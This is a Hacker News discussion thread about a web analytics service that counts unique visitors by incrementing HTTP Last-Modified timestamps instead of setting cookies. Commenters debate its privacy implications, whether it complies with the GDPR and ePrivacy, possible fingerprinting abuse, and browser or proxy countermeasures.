               | [0] http://www.sourcefrog.net/projects/meantime
        
             | ilyt wrote:
             | Kinda need one for the other if you want to distinguish
             | different users vs just one user clicking a lot.
             | 
             | You need some kind of identifier to differentiate between
             | different sessions, and the moment you generate that ID,
             | using whatever way, you are tracking user.
        
             | bawolff wrote:
             | Why would it be useless? Just pick a random date for each
             | user.
        
               | lolinder wrote:
               | I'm not talking about what you could theoretically do
               | with cache headers, I'm talking about what the author of
               | the article is actually doing.
        
               | bawolff wrote:
               | Its not like that is a far walk though. Its the exact
               | same technique, just storing different data.
               | 
               | Respectfully i feel like this would be like seeing an
               | example of css turning a page blue and claiming the
               | technique is useless for turning the page red because
               | that is not the specific example used.
        
               | lolinder wrote:
               | If a bunch of people got up in arms and started
               | complaining because the author of said CSS example hadn't
               | considered that their code could be changed slightly to
               | produce a hate symbol, I'd definitely still jump in and
               | say "but that's not what they were doing!"
        
             | SkyBelow wrote:
             | Counting is not tracking, but counting unique visitors
             | requires tracking to know they are unique. If the person
             | outside of Costco is counting unique visitors, they must be
             | tracking who has already visited and who has not. Even if
             | they aren't doing anything else with that information and
             | forgetting it each night, it is tracking. The existing
             | abuse of tracking has led to a level of backlash where any
             | tracking is seen through the worst possible lens.
        
               | jcuenod wrote:
               | It doesn't require tracking. Tracking would mean I could
               | tell that user x has returned n times. But I have no idea
               | who has returned, only that someone has returned n times.
               | 
               | The person standing outside Costco is counting people by
               | giving them a colored sticker when they walk through the
               | door. If they show up already having one, the counter
               | issues a different color. Who has the stickers is
               | unknown; only the number of stickers distributed in each
               | color is known.
               | 
               | As has been said, this is not to say the technique
               | couldn't be used for nefarious purposes. In this case,
               | it's not, though.
        
               | SkyBelow wrote:
               | That's still a form of tracking. Maybe not enough to
               | identify unique users in some use cases, but even just
               | knowing someone has been here n times is enough if the
               | user numbers are low enough that you can identify users
               | by unique n counts and patterns of n (such as if one user
               | is at 500 and another is at 490, if the second one is
               | logging in daily while the first one hasn't logged in for
               | a few months, and you see the 490 go 491, 492... when
               | they go from 499 to 500, the chance when a 500 logs on
               | tomorrow and becomes 501 it was the 490 account that has
               | been logging in daily).
        
               | jcuenod wrote:
               | Must admit, I've never thought of "number of times I've
               | visited your site" as PII. Number of times I've visited
               | every site in my browser history, maybe, but not "number
               | of times I've visited this specific site". I'm thinking
               | about it, but I'm not immediately convinced.
        
               | [deleted]
        
       | layer8 wrote:
       | If this becomes widespread, browers will probably start fudging
       | the timestamps.
        
       | glenjamin wrote:
       | I think the comments on this post would probably less hostile if
       | the title said something like "detect the number of unique
       | visitors", which is what I believe it's doing, rather than
       | detecting unique visitors using unique timestamps, which is what
       | many seem to be guessing based on the headline alone.
        
         | andix wrote:
         | It would be interesting if it is also possible to abuse it. If
         | it is possible to create enough unique timestamps, that
         | browsers still accept them. Can you add milliseconds to the TS,
         | and do browsers store them too? Or do browsers also accept
         | timestamps from months or years back and re-send them? If you
         | can use the whole scale of Unix time (int32), there is a huge
         | pool of entropy available.
         | 
         | In this case they don't do this evil thing, and it probably
         | would still violate the European GDPR, even if it's not an
         | actual cookie, but somebody has to find it first.
        
           | kapep wrote:
           | Even without millisecond precision, you could embed multiple
           | assets that are served with slightly different timestamps to
           | encode a unique identifier.
        
         | tedunangst wrote:
         | Your personal visit count is embedded in the seconds.
        
           | lisper wrote:
           | Yes, but not your identity.
        
         | michaelbuckbee wrote:
         | They're using this to track number of unique visits from a
         | single user to a site.
        
           | Thorrez wrote:
           | Yes, but I think they're not tracking anything else about the
           | user besides number of visits. E.g. they're not tracking ip I
           | don't think.
           | 
           | And I think they are only doing it within a single day, not
           | across days.
           | 
           | If you know that someone exists who visited your site 500
           | times today, but know nothing else about the person, is that
           | a privacy problem?
        
       | rkagerer wrote:
       | ...at the cost of caching (or at least a round trip).
       | 
       | Is it necessary to know how many visits per day a particular user
       | made? If # of unique visitors per day/week/whatever is
       | sufficiently granular you could retain a corresponding cache
       | window.
       | 
       | Also if this is to avoid those cookie warnings that got popular
       | after GDPR, it should be noted you're still storing information
       | on users' computers. i.e. The stuffed metadata is not so
       | different in principle from a cookie. In this case it seems
       | innocuous, but I wouldn't be surprised to see sites exploit your
       | trick to store a unique last-modified date for each user as a
       | method of tracking (if that's not already commonplace).
        
         | not2b wrote:
         | The number of unique visits in a day is the number of total
         | visits minus the number of repeat visits from the same users,
         | so they need something like this to get an accurate count. You
         | can't produce the number without information on repeat
         | visitors.
         | 
         | I think you are right that this technique could be changed and
         | turned into a way to track individual users. But as
         | implemented, it doesn't do that, and all knowledge is lost
         | after one day. We shouldn't criticize people who are trying to
         | limit the information they collect to the bare minimum by
         | pointing out an altered version of their system might have
         | undesirable properties.
        
           | rkagerer wrote:
           | Then the server doesn't need to know about repeat-visits that
           | don't hit it, and it would be nice to maintain caching
           | support if the page content is static.
        
       | irq-1 wrote:
       | Change 'last-modified' to use a secure hash of the contents, like
       | sha256. Then the browser can detect if a website is giving bad
       | hashes, potentially using them for tracking.
        
         | sdfhbdf wrote:
         | Thats what ETag is for.
         | 
         | https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/ET...
        
           | irq-1 wrote:
           | ETags can be anything -- they aren't required to be a hash of
           | the content.
           | 
           | Thinking about this problem, why does the browser expose any
           | information about what's in the cache? Client-side JavaScript
           | can't tell what's in the cache because it's an obvious
           | security issue. Why let the server know?
           | 
           | Browsers should ask for the hashes on a list of content
           | without exposing their cache contents. Then the browser can
           | request anything thats changed.
        
             | jefftk wrote:
             | The way If-None-Match is that the browser says "give me the
             | latest if this ETag represents an out-of-date resource,
             | otherwise I'll keep using my copy." It's not clear to me
             | how you're proposing this work instead?
             | 
             | (Also, in many cases the server uses a hash of the inputs
             | to generating the resource, which isn't something
             | externally verifiable)
        
           | jefftk wrote:
           | ETag doesn't have any assurance that it's a hash of the page
           | contents: the current protocol doesn't stop the server from
           | embedding arbitrary information in the ETag, and there's no
           | way for the client to tell.
        
             | debugnik wrote:
             | Neither does Last-Modified, as we just saw. If we were
             | going to alter the meaning of a header for this, it should
             | be ETag. Just agree on ETag formats that browsers can
             | verify are just hashes, and have them throw away any opaque
             | ETags or dates.
        
               | jefftk wrote:
               | You'd need to introduce something new for that. Many
               | servers compute ETags today as hashes of _inputs_ to a
               | process.
               | 
               | (Which is nice computationally, since you can immediately
               | say "not modified" instead of building the response,
               | hashing it, and throwing it away if the hash matches)
        
               | debugnik wrote:
               | Well, I said "just hashes" for sort, but such ETag
               | formats could agree on other algorithms as well, as long
               | as the browser can verify them.
               | 
               | And introducing a new method doesn't solve the issue of
               | deprecating the existing abusable methods, which is why I
               | suggested one that can already be implemented by privacy-
               | first browsers one-sidedly. Servers would then be
               | pressured to migrate to some friendly ETag format if they
               | don't want to completely lose client-side caching for a
               | (hopefully growing) share of their userbase.
        
       | Isinlor wrote:
       | This is really no different than a cookie - basically the same
       | mechanism from the view of the server just different semantics.
        
         | geocar wrote:
         | Well, yes you could have a cookie with C=C+1 and carefully set
         | the expiration to the end of the day (like the article), or you
         | could use randomly generated last-modified times and
         | deduplicate server-side (similar to how cookies are usually
         | used), but I can think of a few reasons the cache would give
         | greater precision, so even if a lot of the same things are the
         | same, I'm not so sure it's really "no different"; these things
         | are pretty important to (some) publishers:
         | 
         | - third-party cookie blocking/notification features in browsers
         | 
         | - review processes on ad networks checking for actual cookies
         | rather than suspicious last-modified times
        
         | legitster wrote:
         | If anything, this is worse.
         | 
         | Cookies have built in browser behavior - they have limited
         | scope, the browser lets you see them, they get cleared out
         | regularly.
         | 
         | Abusing metadata is way sketchier.
        
           | eurasiantiger wrote:
           | Chances are they aren't the first to come up with something
           | like this. How can we detect this kind of metadata abuse?
        
             | fanso99 wrote:
             | perhaps randomize minutes/seconds of the "last-modified"
             | header.
        
               | notpushkin wrote:
               | Or perhaps just drop minutes/seconds. And maybe don't
               | store the date altogether for files that are small
               | enough?
        
         | pornel wrote:
         | Important to note that privacy laws that regulate tracking are
         | not limited to the Cookie header. They apply to tracking and
         | data collection in general, regardless of how technically
         | clever you make it.
        
         | ape4 wrote:
         | Yes, cookies are a header field sent back by the browser and so
         | is this.
        
         | pavon wrote:
         | Exactly. They could have the same functionality and privacy
         | characteristics if they simply kept a cookie that incremented
         | each time the site was visited. The fact that they didn't go
         | this route suggests this is more about finding a way to track
         | unique visitors when cookies are disabled. They are
         | deliberately subverting the user's desire to not be tracked and
         | spinning it as a privacy win.
        
           | dahfizz wrote:
           | If it was about tracking users, wouldn't they generate a
           | unique timestamp per visitor on the first visit? Giving
           | everyone the same timestamp is a terrible way to try and
           | track individuals.
        
         | dvko wrote:
         | This is part of why I quit my privacy focused analytics start-
         | up years ago. I won't name it directly, but it was one of the
         | first and is still going strong (although not really open-
         | source anymore).
         | 
         | People kept asking for cookieless tracking but with another way
         | of identifying returning visitors that was always worse from a
         | privacy standpoint. Cookies can be controlled by the client,
         | anything stored on the server can not.
         | 
         | Honestly, cookies are pretty nice, it's the law around this
         | that sucks. Tricks that attempt to bypass the laws will surely
         | only work for a limited time, at least I hope they will...
        
       | yunruse wrote:
       | Hm, on Safari 16.1 it seems reloading twice clears the cache and
       | therefore the counter (but eg cmd-W cmd-Z cmd-R will safely
       | increase it). Either way, I think I would prefer this behaviour
       | to be some sort of cookie that the law okays, because as everyone
       | else has said, I'm quite browsers will fuzz these data.
       | 
       | (I would probably go for a Gaussian fuzzer each visit, just
       | because it adds the off chance that it's quite a way away from
       | any attempted ID, making it a little bit more difficult to cast a
       | wider net and get a few bits of entropy)
        
       | mikem170 wrote:
       | Their demo counter [0] didn't work in my browser, maybe because I
       | normally have javascript disabled.
       | 
       | In the demo it seems they have XMLHttpRequest code calling
       | ping.withcabin.com/cache for this trick of theirs.
       | 
       | Can this method of counting be made to work without javascript?
       | 
       | [0] https://lastmodified.normally.com/
        
       | zagrebian wrote:
       | > Many privacy-focused analytics services will generate and store
       | a UID on the server instead of saving it in a cookie - based on a
       | hash of your User Agent, IP, Location, Date etc.
       | 
       | What location? The Geolocation API?
       | 
       | What date? How can a date contribute to a UID? Each visitor sends
       | multiple HTTP requests at different dates.
        
       | notpushkin wrote:
       | If it's anonymous and doesn't collect any user data, why do we
       | need it at all? Would using a cookie for the same purpose (just a
       | counter of visits, resetting every day) trigger the GDPR laws
       | somehow? It would work in literally same way except being
       | transparent to the user instead of utilizing some shady
       | technique.
        
       | zzo38computer wrote:
       | It should be able to detect that the date is not valid (and that
       | their precision is wrong), and avoid sending a "If-Modified-
       | Since" header. (The same would be true if they were assigned at
       | random rather than sequential like this; it still should be able
       | to detect that they are not valid and have wrong precision.)
        
       | [deleted]
        
       | birdmanjeremy wrote:
       | The demo doesn't work in safari on my mac. It sometimes gets to
       | 2, but on refresh goes back to 1. Actually, got it up to 4 one
       | time. Seems like the claims of "Works in any browser and any
       | server" are overstated.
        
         | devmunchies wrote:
         | same. I got it up to 8 by clicking into the address bar and
         | hitting enter. However, doing a refresh instead caused it to
         | reset (the browser didn't send the if-modified-since header so
         | the server didn't do it's little trick and instead started
         | over)
        
       | alexmolas wrote:
       | What if during a day I visit the website more than 86400 times?
       | ;)
        
       | speedgoose wrote:
       | > This is great for privacy as we don't need to use cookies, IP
       | addresses, fingerprinting or unique identifiers. In our tests,
       | this method proved durable enough to be the most reliable method
       | of counting unique visitors without using cookies.
       | 
       | The differences with a cookie are that the header is named Last-
       | modified instead of Set-Cookie and Cookie, and the value must be
       | a datetime in the RFC2616 format.
       | 
       | How is it good for privacy? I think it's worse because it's
       | invisible for the user. I would bet tracking visitors using such
       | an hack isn't compatible with GDPR, that requires an informed
       | consent for tracking. And good luck explaining your hack to the
       | average visitor.
        
         | Etheryte wrote:
         | You seem to slightly misunderstand how GDPR works. Tracking in
         | and of itself is not the problem, it's personal data and
         | personally identifying data that is. You can count how many
         | hits your server receives no problem, this is roughly the same
         | idea.
        
           | havkom wrote:
           | Basically the "cookie consent" part in the EU stems from the
           | e-privacy directive. Article 5.3 refers to GDPR (through the
           | directive that is replaced by GDPR) and reads:
           | 
           | Member States shall ensure that the storing of information,
           | or the gaining of access to information already stored, in
           | the terminal equipment of a subscriber or user is only
           | allowed on condition that the subscriber or user concerned
           | has given his or her consent, having been provided with clear
           | and comprehensive information, in accordance with Directive
           | 95/46/EC, inter alia, about the purposes of the processing.
           | This shall not prevent any technical storage or access for
           | the sole purpose of carrying out the transmission of a
           | communication over an electronic communications network, or
           | as strictly necessary in order for the provider of an
           | information society service explicitly requested by the
           | subscriber or user to provide the service.
           | 
           | In short, this method may fall under the EU "cookie law"
           | above. The use of timestamps may require consent if they are
           | used to distinguish users (even if only for counting
           | purposes). The timestamps may then also be personal data
           | under the GDPR.
        
           | luckylion wrote:
           | This is equivalent to setting a cookie with a hit count. It's
           | still storing & submitting information, it's just not using a
           | unique identifier (Which is pretty privacy-respecting, I'm
           | not saying it's a terrible thing or something).
           | 
           | I assume it will be treated as such, too. If you can use a
           | cookie to do this without consent, this is fine too. If you
           | can't then it's not. The same happens for local/session
           | storage: it's cookie-equivalent.
        
             | xyproto wrote:
             | The user with the highest visit count will always be
             | uniquely identifiable, though.
        
               | not2b wrote:
               | Only on the same day. Everything is reset the next day.
        
               | jiveturkey wrote:
               | I don't follow how this is a problem.
               | 
               | By that measure, any users behind a unique single IP (no
               | IP pooling, no CGNAT, etc) will always be uniquely
               | identifiable. And for IP there's much fewer steps to
               | personally identify the user. The server necessarily sees
               | the user IP.
        
               | speedgoose wrote:
               | Yes, the IP can be used to identify people. If you want
               | to track users using their IP and respect GDPR, you need
               | to get their consent first.
               | 
               | The best is to not store them before you get consent.
               | Having a temporary access log with a few IPs is probably
               | fine. But keeping all your access logs forever for
               | analytics purposes is not fine anymore.
        
           | speedgoose wrote:
           | I will quote the law:
           | 
           | > Natural persons may be associated with online identifiers
           | provided by their devices, applications, tools and protocols,
           | such as internet protocol addresses, cookie identifiers or
           | other identifiers such as radio frequency identification
           | tags. This may leave traces which, in particular when
           | combined with unique identifiers and other information
           | received by the servers, may be used to create profiles of
           | the natural persons and identify them.
        
       | jakobdabo wrote:
       | ETag (paired with If-None-Match header sent by the browsers) is
       | another caching header to be aware of.
       | 
       | https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/ET...
        
         | doomrobo wrote:
         | Ooh that's kinda evil. A server could give a client a uniquely
         | identifying ETag for a given URL. So whenever the client comes
         | back on the same browser, they're identified.
         | 
         | Fortunately this is probably just as detectable as the Last-
         | Modified abuse in the post.
        
           | bawolff wrote:
           | There are a lot of things like that. Although browsers
           | changed it recently, you also used to be able to use TLS
           | session tickets.
           | 
           | Another one was the favicon cache.
           | 
           | Pretty much any state on the browser can be used to track
           | people.
        
       | mulhoon wrote:
       | Hi, author of the article here.
       | 
       | Just to give a little more background here.
       | 
       | Cabin doesn't store a row in a database for each visit. It only
       | stores one row, per day per domain. The attributes for that row
       | are simple tally counts - visits, uniques, bounces etc. So no
       | identifier is stored, and the hits go into the tally. We do not
       | store the fact that a user has visited x amount of times. The
       | demo here is to show how the technique works.
       | 
       | Cabin used to detect only the presence of _any_ last-modified
       | date to determine if the visit is unique or not. But extending it
       | to distinguish hits 1,2 and 3 (by adding 1 second to the start of
       | the day) now allows us to count the bounce rates too.
        
         | ohbtvz wrote:
         | Have lawyers familiar with EU law vetted your technique? Could
         | you share their legal reasoning? If not, why would anyone ever
         | take the risk to use your product and face huge fines?
        
           | senko wrote:
           | (Not OP)
           | 
           | I am all for privacy, use uBO, Firefox Focus / Incognito and
           | Google alternatives. But if I have to consult a lawyer each
           | time I write some code or write up a blog post, I'll take up
           | gardening instead.
        
             | jefftk wrote:
             | The OP is a "privacy-first web analytics" company; this is
             | totally something they should be asking their lawyers.
             | 
             | Note that their list the GDPR on their "Privacy law
             | compliance" page (https://docs.withcabin.com/privacy.html)
             | but not ePrivacy...
        
             | ohbtvz wrote:
             | No need for this kind of hyperbole. I wouldn't ask this
             | question if the OP's post didn't contain grandiose claims
             | such as "No cookies, no consent banners, no ad networks,
             | 100% GDPR & CCPA compliant, low footprint web analytics."
             | OP made a claim about their compliance with EU law. I'm
             | asking for proof or at least an explanation.
        
             | rcoveson wrote:
             | How about just consulting a lawyer each time you abuse a
             | protocol to get user's software to behave in a way that is
             | invisible to them and benefits you?
             | 
             | There is already a correct way to tell a browser to tell
             | the server something with each subsequent request: Cookies.
             | Nobody needs to "write some code" here; it's already
             | written. Working around the protocol isn't engineering,
             | it's just lying.
             | 
             | This blog post is just another cynical degredation of trust
             | between users and their browsers, and browers and the
             | servers they talk to. Just another part of HTTP that we
             | can't use for what it was designed for anymore because
             | servers want so desperately to track visitors uniquely and
             | a significant subset of visitors would prefer not to be
             | remembered uniquely.
        
         | jefftk wrote:
         | Your landing page says "no cookies or consent banners" and
         | "compliant with all privacy laws", but the timestamp approach
         | stores data on a user's computer in a way that is not "strictly
         | necessary in order to provide an information society service
         | explicitly requested by the subscriber or user". Could you
         | explain how you see your approach as compliant with the
         | ePrivacy directive?
         | 
         | Full text: https://eur-lex.europa.eu/legal-
         | content/EN/TXT/HTML/?uri=CEL...
         | 
         | Guidance:
         | https://ec.europa.eu/justice/article-29/documentation/opinio...
        
           | IshKebab wrote:
           | Yeah this is just a cookie by another name. Probably already
           | used by supercookies.
           | 
           | The GDPR doesn't single out cookies so you can't get around
           | it by using a different storage device.
        
             | jefftk wrote:
             | _> The GDPR doesn 't single out cookies so you can't get
             | around it by using a different storage device._
             | 
             | Quibble: this isn't a GDPR issue, it's an ePrivacy issue.
             | Two different regulations.
        
         | lolinder wrote:
         | Thanks for sharing!
         | 
         | I personally don't have an issue with it, but one thing that
         | might set some of the people here at ease is if you stopped
         | incrementing the timestamp after the second visit.
         | 
         | This would give you three possible states anyone could be in:
         | never visited, visited once, and visited more than once. It's
         | less data, but still enough to give you your bounce rate _and_
         | your total visits while minimizing the number of boxes you 're
         | sorting individual visitors into.
        
       | josephscott wrote:
       | This reminded me of something I haven't thought about in awhile:
       | evercookie - https://github.com/samyk/evercookie
        
       | [deleted]
        
       | tobr wrote:
       | That's pretty clever. I think if you really want to keep it
       | privacy respecting, you should stop counting at 1 - so you can
       | distinguish the first vs subsequent visits, but you can't tell if
       | someone has visited 2 or 200 times.
        
         | AkshatJ27 wrote:
         | what is the problem with letting a website know how many times
         | I have visited the page? How is it better for a website to only
         | know if I have visited earlier or not?
        
           | xyproto wrote:
           | Many clients may have visited only one time, but when you
           | reach higher numbers they may be used together with other
           | data to help identify users.
           | 
           | Maybe only one user will have over 100 visits, and then you
           | can uniquely identify them.
        
             | barefeg wrote:
             | Makes sense. I'm not very experienced in privacy but could
             | you explain why uniquely identifying the user is a problem?
             | As in you can tell that there's one user who visited 100
             | times but how can you use that information to correlate
             | with an identity?
        
               | _justinfunk wrote:
               | This is also my question that all the people wearing
               | their smart lawyer hats seem to be claiming but not
               | explaining.
        
         | WirelessGigabit wrote:
         | Every subsequent visit they bump up the number.
        
         | cortesoft wrote:
         | I am having trouble understanding how knowing someone has
         | visited three times is more privacy invasive than knowing they
         | visited twice. What is so magical about 3?
        
           | tobr wrote:
           | Consider that there's some long tail of visitors who visit
           | many times in one day. Someone is going to be visiting more
           | times than anyone else, whether that's 10 or 100 or 1000 page
           | views. That person is now uniquely trackable. To avoid that
           | situation you need to stop counting somewhere, and you're not
           | really getting any new info after 1 (well, 2 I suppose, if
           | you want to track bounces), so you might as well stop there.
        
             | dahfizz wrote:
             | I don't agree that the existence of this header makes a
             | user more trackable. You can already uniquely identify
             | visitors with their IP & source port, which is included in
             | every single packet and is way more specific than some
             | timestamp.
             | 
             | Your argument seems to be that this timestamp in the header
             | could possibly be used as a lookup key in a database of
             | visitors. I think that's a stretch, but in any case that
             | database would be the privacy violating thing. This header
             | is completely anonymous.
        
               | tobr wrote:
               | You're probably right! But since they aren't getting any
               | more info by continuing to count after 2, it's just a
               | liability to do it. After all, the whole point of the
               | setup seems to be to minimize the amount of unique
               | information the system has to process.
        
           | o_m wrote:
           | Counting to two is needed to handle the bounce rate.
        
           | kube-system wrote:
           | 3 is magical in that it comes after 2.
           | 
           | If 100 people visited once, and one person visited twice...
           | then a new request with visitCount=3 is that second person.
        
       | Jabdoa2 wrote:
       | I guess according to GDPR this counts as tracking nontheless.
       | GDPR does not specifically mention cookies or anything technical.
       | An identifier is enough (does not have to be a uuid). IP,
       | location, browser etc already counts. This probably would count
       | as storing something like a cookie on the client.
        
       | WirelessGigabit wrote:
       | I wonder how this works with systems like Akamai which by default
       | mess with those headers.
        
       | DueDilligence wrote:
       | .. and we're fast on-track of a webkit extension to block this
       | BS.
        
         | cactacea wrote:
         | Why block it entirely when you can just feed them garbage data?
        
           | cpeterso wrote:
           | Sending a garbage Last-Modified time might confuse the server
           | and cause unpredictable problems for the user. Blocking it is
           | safe because the server will just assume this is the first
           | time the user has visited the website.
        
           | enkrs wrote:
           | Whats the motivation to block/misinform?
           | 
           | This allows site owners get statistics on page
           | views/uniques/bounces without unique identifier cookies or
           | javascript injections.
           | 
           | I'm all for blocking any abusive tracking methods, but this
           | looks to me like creative website statistics that works for
           | single domain. What's the harm by measuring that?
        
             | michaelt wrote:
             | While this _particular_ implementation doesn 't track
             | individuals, couldn't your trivially start tracking
             | individuals by sending them unique random times like _last-
             | modified: 12 Mar 1978 12:34:56 GMT_ thereby giving them a
             | ~30 bit unique identifier for as long as the file is
             | cached?
        
               | pwdisswordfish0 wrote:
               | Only if you disregard the amount of latitude that the
               | semantics of these headers give to UAs that would
               | effectively thwart this method of tracking.
               | 
               | If I fetch your /foo.html today in November 2022, and you
               | send me a last-modified from 1978, that gives me and my
               | UA a huge range from which to select a different datetime
               | (anywhere between the 1978 value and now-ish) on my next
               | request. How are you going to correlate my original and
               | subsequent requests if in the latter I ask if you've got
               | a copy that's been modified since 1999?
        
               | marshray wrote:
               | Sure, a UA _could_ do a whole lot of things to resist
               | fingerprinting.
               | 
               | But users go to the web with the browser they've been
               | given.
               | 
               | Apple, famously, forbids its users to speak HTTP with
               | anything else on iOS.
        
             | nkrisc wrote:
             | > Whats the motivation to block/misinform?
             | 
             | What's the motivation to submit to it?
        
               | yojo wrote:
               | Allowing websites to get a somewhat accurate count of
               | visitors plus bounce rate helps them to tell how they're
               | doing. Hopefully, they use that to guide developing a
               | better product/service.
               | 
               | If you can allow them to do that without getting tracked,
               | it's win-win. You get a better experience when they build
               | a better service.
        
         | yojo wrote:
         | To be clear, they're not generating _unique_ headers. They're
         | setting them to the day start, so they can tell if the
         | requester has already been to the site today or not. It
         | actually seems pretty reasonable.
        
           | pavon wrote:
           | They way they are using it is providing less information than
           | a UID cookie would, but the same amount of information as a
           | boolean "previously visited" cookie. However, now that the
           | technique is known there is nothing stopping people from
           | using the same method to store a UID date, and privacy
           | protecting clients will have difficulty differentiating
           | between the two, so best to eliminate this as a
           | fingerprinting method altogether.
        
             | not2b wrote:
             | People keep saying in this thread "there is nothing
             | stopping people from using the same method" to do something
             | else! I think that this is an irrelevant criticism. This is
             | a valid attempt to minimize the amount of information
             | collected on visitors and still providing a unique visitors
             | per day count, and the fact that someone could build a
             | similar but different system that looks like a cookie isn't
             | relevant.
        
               | pavon wrote:
               | They demonstrated a PoC that uses an HTTP feature in a
               | way it wasn't intended to add entropy to fingerprinting
               | techniques. Discussing how this same exploit could be
               | used maliciously by others and how to prevent that isn't
               | criticism of the PoC, it is standard security practice.
        
             | chipsa wrote:
             | But you can't have as many bits in a UID date as for a
             | generic cookie, and a privacy protecting client could just
             | ignore the ones that don't make sense. Does a 1978 date
             | make sense? Probably not. You could scale this up to the
             | millions, probably, but it won't scale infinitely.
        
               | genewitch wrote:
               | roblox has ~50mm daily users (DAU), and if my math is
               | correct (it probably isn't) you could have hour
               | granularity (only 0-23) timestamps on 6 files, each day,
               | and track 191mm unique users. I used roblox because i
               | knew their DAU off-the-cuff - because roblox requires a
               | login, they know who you are anyhow.
               | 
               | But if you do 1 second granularity a mere 2 cache
               | timestamps are enough to fingerprint everyone on the
               | planet, each day.
               | 
               | is my math wrong, here?
        
         | rnhmjoj wrote:
         | There probably is one already: this method is so old that the
         | documentation of privoxy shows[1] how to defeat it. I can
         | confirm it works: their example[2] website says I've visited
         | 61996 times.
         | 
         | [1]: https://www.privoxy.org/user-manual/actions-
         | file.html#OVERWR...
         | 
         | [2]: https://lastmodified.normally.com/
        
       | jesprenj wrote:
       | What's the reason for not storing a cookie? It's not like
       | browsers that don't support cookies are targeted, right? Cookies
       | can also be "great for privacy", if their power is not abused
       | server-side ...
        
       | jefftk wrote:
       | I think this is probably illegal in EU countries. The ePrivacy
       | Directive requires consent before storing data on a user's
       | machine that isn't strictly necessary for providing the service
       | the user requested. Analytics isn't "strictly necessary", and
       | ePrivacy doesn't care whether you use the Cookie header or some
       | other method of storage.
       | 
       | I do think this is better for privacy than standard id-based
       | approaches, but the law is very strict. More:
       | https://www.jefftk.com/p/why-so-many-cookie-banners
       | 
       | (Not a lawyer)
        
         | yellow_lead wrote:
         | Assuming you're correct, can anyone think of a way to count
         | unique visitors without storing data on a users machine _or_
         | using identifiable user information? Identifiable user
         | information should include hashes that can be re-computed given
         | the original information.
         | 
         | This isn't a criticism of the law, I'm just curious what
         | options there could be, because I can't think of any.
        
           | genewitch wrote:
           | Hi there, Marketing Company Intern!
           | 
           | Tell them you'd rather make the coffee ;-)
        
             | 411111111111111 wrote:
             | Ha, that would explain that question. My first reaction was
             | mostly confusion as there is so much prior art at this
             | point, i.e. fingerprinting through installed add-ons,
             | resolution/window size/system language, browser language,
             | IP locality etc. There are even demo pages around which
             | shows you just how unique your configuration is even
             | without anything else.
             | 
             | https://amiunique.org/fp
        
             | yellow_lead wrote:
             | Lol, I knew it would sound that way, but I don't work in
             | this domain - just interested in privacy and this problem.
        
               | genewitch wrote:
               | the only reason we could think of for wanting unique
               | visitors was for the marketing people or
               | investors/stakeholders/shareholders. Parsing the request
               | logs should be sufficient for every other metric.
               | 
               | We had a bunch of meetings about this at what essentially
               | amounted to a giant information superhighway billboard
               | company. IIRC someone brought up using cache headers even
               | back then, because it didn't require cookies or
               | javascript, which we couldn't guarantee would be "up to
               | date", this is back in "target IE6, still" days.
               | 
               | As one of my networking friends said, advertisers usually
               | know everything about your metrics, even if you don't.
               | You can't really fudge the numbers in your favor, so raw
               | requests or QPS or whatever ancillary metric would be
               | enough.
               | 
               | the method in the article is defeated by clearing your
               | session when you're done browsing, or using
               | incognito/private browsing tab, as that should mark all
               | "cached" items for deletion.
        
           | [deleted]
        
         | Quarrelsome wrote:
         | I thought GDPR cared mostly about uniquely identifying visitors
         | which this does not do. You still need a cookie banner to state
         | that you will put some data on their machine but you always
         | need one of those.
        
           | jefftk wrote:
           | _> you always need one of those_
           | 
           | The withcabin.com landing page claims you don't need consent
           | banners to use it.
        
             | t0mas88 wrote:
             | That claim is false in Europe. You need to ask permission
             | for this approach, because you're storing something on the
             | user's device (the generated date in the cache) that isn't
             | strictly necessarily. The ePrivacy directive says you need
             | permission for that, nowhere does the law specify "cookies"
             | it's about any kind of data stored on the user device.
        
               | jefftk wrote:
               | Uh, yes? That's exactly what I've been saying upthread.
        
               | mgrund wrote:
               | True it does not matter if it's a cookie, or whatever.
               | You need to look to the ePrivacy directive article 5.3
               | for which exemption case applies. In the case of
               | timestamps, it would be case A :
               | 
               | > when the cookie is used "for the sole purpose of
               | carrying out the transmission of a communication over an
               | electronic communications network" ("Exemption A")
               | 
               | Since the timestamp is no longer used solely for this
               | purpose, you need consent.
        
       | bvinc wrote:
       | What's to stop someone from sending unique last-modified dates to
       | uniquely fingerprint browsers?
        
         | nightpool wrote:
         | Because the cache key for the site is partitioned by top-level
         | origin in modern browsers, they wouldn't get any additional
         | information this way that they couldn't get with existing
         | first-party storage techniques, such as service worker caches,
         | session cookies, IndexedDB, etc. See e.g.
         | https://developer.mozilla.org/en-US/docs/Web/Privacy/State_P...
         | for example. Opening a new incognito window would trivially
         | defeat this method of "tracking". This is basically just a very
         | small first-party-only cookie.
        
           | SahAssar wrote:
           | Then why not use a cookie? The laws regarding tracking are
           | not actually about cookies, but about all cookie-like
           | tracking. What does this method gain?
        
             | nightpool wrote:
             | The ability to put "no cookies :)" in your marketing
             | materials
        
             | [deleted]
        
       | 1vuio0pswjnm7 wrote:
       | What happens if the user disables Javascript.
       | 
       | The page lastmodified.normally.com claims "Works in any browser
       | or any server". What if the browser has no Javascript engine.
       | 
       | In this case I tried the demo with a browser that has a JS
       | engine, with JS enabled, and the demo still did not work. That is
       | because "ping.withcabin.com" was not disclosed to the user. The
       | OP suggests that users access "lastmodified.normally.com". It
       | says nothing about accessing "ping.withcabin.com". As such, the
       | proxy does not contain any address info for that domain. The user
       | (me) never typed it.
       | 
       | Instead of a browser, I use a localhost-bound forward proxy to
       | control requests and responses, including HTTP headers. The proxy
       | contains all of the domain-to-IP address mappings I need in
       | memory. Why should I add an IP address for "ping.withcabin.com".
       | The request returns no content.
       | 
       | 1. For example, something like                   acl cabin
       | hdr(host) -m str ping.withcabin.com         http-request del-
       | header If-Modified-Since if cabin         http-response del-
       | header Cache-Control if cabin         http-response del-header
       | Last-Modified if cabin
        
       | bennyp101 wrote:
       | Seems a fairly benign way of counting how many people are
       | visiting your site.
       | 
       | Not like its tracking you across domains and services, more a
       | counter for how many people have visited, and either stayed and
       | looked around, or left.
        
         | meowface wrote:
         | >Not like its tracking you across domains and services
         | 
         | The same can be said of first-party cookies.
        
       ___________________________________________________________________
       (page generated 2022-11-30 23:00 UTC)